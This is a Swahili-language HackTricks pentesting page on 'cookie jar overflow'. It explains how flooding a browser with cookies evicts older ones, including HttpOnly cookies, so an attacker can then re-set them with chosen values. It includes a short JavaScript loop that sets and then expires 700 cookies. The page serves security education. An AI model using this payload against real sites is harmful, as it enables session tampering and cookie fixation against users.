hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
2024-02-11 02:13:58 +00:00

3.2 KiB

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Vivinjari vina kikomo cha idadi ya vidakuzi ambavyo wanaweza kuhifadhi kwa ukurasa. Kwa hivyo, ikiwa kwa sababu fulani unahitaji kufanya kuki itoweke, unaweza kujaza kikombe cha kuki kwani zile za zamani zitafutwa kwanza:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Tambua, kuwa kuki za watu wengine zinazoelekeza kwenye kikoa tofauti hazitaandikwa upya.

{% hint style="danger" %} Shambulio hili pia linaweza kutumika kuandika upya kuki za HttpOnly kwani unaweza kuzifuta na kisha kuzirejesha na thamani unayotaka.

Angalia hii katika makala hii na maabara. {% endhint %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: